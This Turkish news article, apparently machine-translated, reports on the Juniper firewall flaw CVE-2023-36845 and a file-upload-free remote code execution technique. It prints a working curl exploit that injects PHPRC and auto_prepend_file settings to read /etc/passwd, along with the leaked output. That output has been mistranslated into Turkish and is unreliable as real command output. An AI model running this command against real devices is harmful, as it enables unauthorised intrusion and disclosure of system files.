Juniper Güvenlik Duvarları Kimliği Doğrulanmamış Kod Yürütülmesine Karşı Savunmasız


Ağustos 2023’ün sonunda Juniper Networks, SRX ve EX serisi güvenlik duvarlarını etkileyen CVE-2023-36845 güvenlik açığından bahseden bir güvenlik danışma belgesi yayınladı. Güvenlik açığı şu şekilde sınıflandırıldı: Orta (5.3) önem derecesine sahip güvenlik açığı.

Bunu takiben watchtowr’daki güvenlik araştırmacıları, kavram kanıtıyla birlikte bu güvenlik açığından yararlanabilecek bir yöntem yayınladı. Bu özel rapor, SRX güvenlik duvarlarının J-Web arayüzündeki webauth_operation.php dosyasındaki do_fileUpload işlevinin istismarını içeriyordu.

Bu yöntemin ardından birçok tehdit aktörü, savunmasız Juniper Güvenlik Duvarlarından yararlanmak için webauth_operation.php dosyasını hedeflemeye başladı.

Güvenlik araştırmacıları, herhangi bir dosya yüklemeden kimliği doğrulanmamış uzaktan kod yürütme gerçekleştirebilecek yeni bir yöntem keşfettiler (watchTowr yöntemi).

Belge

Demo Alın

DoControl ile ihtiyaçlarınıza uygun iş akışları oluşturarak SaaS uygulamalarınızı ve verilerinizi güvende tutabilirsiniz. Riskleri tanımlamanın ve yönetmenin kolay ve etkili bir yoludur. Kuruluşunuzun SaaS uygulamalarının riskini ve maruziyetini yalnızca birkaç basit adımda azaltabilirsiniz.

Dosya Yükleme Mevcut Değil = PHPRC + cURL

Analizin bir parçası olarak araştırmacılar bir SRX210 güvenlik duvarı satın aldılar ve watchTowr dosya yükleme yöntemini kullanarak bu güvenlik duvarından yararlanmaya çalıştılar. Ne yazık ki, belirtilen güvenlik duvarında do_fileUpload kullanılamadığı için bu mümkün olmadı.

Daha fazla araştırma yaptıklarında araştırmacılar Juniper güvenlik duvarlarının bir CGI betiğini çağıran bir Appweb sunucusu kullandığını keşfettiler. Bu CGI betiği, kullanıcının HTTP isteğine erişmek için birden fazla ortam değişkeni ve argümanı kullanır. Ek olarak, bu güvenlik duvarları FreeBSD üzerinde çalışır ve /dev/fd/0’ı açarak stdin’e erişebilir.

Başlangıçta, auto_prepend_file=”/etc/passwd” ile bir curl isteği gönderildi ve bu, /etc/passwd dosyasının bilgilerinin başarıyla sızdırılmasına neden oldu.

Ancak uzaktan kod yürütülmesini sağlamak için araştırmacılar, izin_url_include özelliğini etkinleştirdi ve güvenlik duvarına bir kıvrılma isteği gönderdi.

Bu kez istek, Allow_url_include, auto_prepend_file ve data://’yi içeriyordu (ile birlikte ) kimliği doğrulanmamış bir kod yürütülmesine neden oldu.

$ curl “http://10.12.72.1/” -F $’auto_prepend_file=”/etc/passwd\n”’ -F ‘PHPRC=/dev/fd/0’
kök:*:0:0:Charlie &:/kök:/bin/csh
arka plan programı:*:1:1:Birçok sistem işleminin sahibi:/root:/sbin/nologin
operatör :* : 2 : 5 : Sistem & : / : / sbin / oturum açma
bin : * : 3 : 7 : İkili Komutlar ve Kaynak : / : / sbin / nologin
tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533:KMem Korumalı Alanı:/:/sbin/nologin
oyunlar:*:7:13:Oyunların sözde kullanıcısı:/usr/games:/sbin/nologin
adam:*:9:9:Bay Adam Sayfaları:/usr/share/man:/sbin/nlogin
sshd : * : 22 : 22 : Güvenli Kabuk Arka Planı : / var / empty : / sbin / nlogin
dahili:*:39:39:Harici uygulamalar:/:/sbin/nologin
bağlama:*:53:53:Korumalı Alana Bağlama:/:/sbin/nologin
uucp:*:66:66:UUCP sözde kullanıcı:/var/spool/uucppublic:/sbin/nologin
hiç kimse:*:65534:65534:Ayrıcalıksız kullanıcı:/varolmayan:/sbin/nologin



Giriş Yapın – Juniper Web Cihaz Yöneticisi
Doğrulanmamış RCE Çıkışı (Kaynak: VulnCheck)

Ayrıca Vulncheck tarafından, internete bakan yaklaşık 15.000 Juniper güvenlik duvarının henüz yamalanmadığına dair şok edici bilgiler içeren tam bir rapor yayınlandı.

Bununla birlikte araştırmacılar, LD_PRELOAD ortam değişkenini ayarlayarak etkilenen sistemlerde hata oluşturan bir tarayıcı içeren bir GitHub deposu da yayınladılar.

Juniper Güvenlik Duvarlarını kullanan kuruluşların, tehdit aktörlerinin bu yöntemleri istismar etmek amacıyla kullanmasını önlemek için Juniper Networks tarafından yayınlanan güvenlik tavsiyesi uyarınca en son sürüme yükseltmeleri önerilir.

Bizi Google Haberler, Linkedin’den takip ederek en son Siber Güvenlik Haberlerinden haberdar olun, heyecanve Facebook.





Source link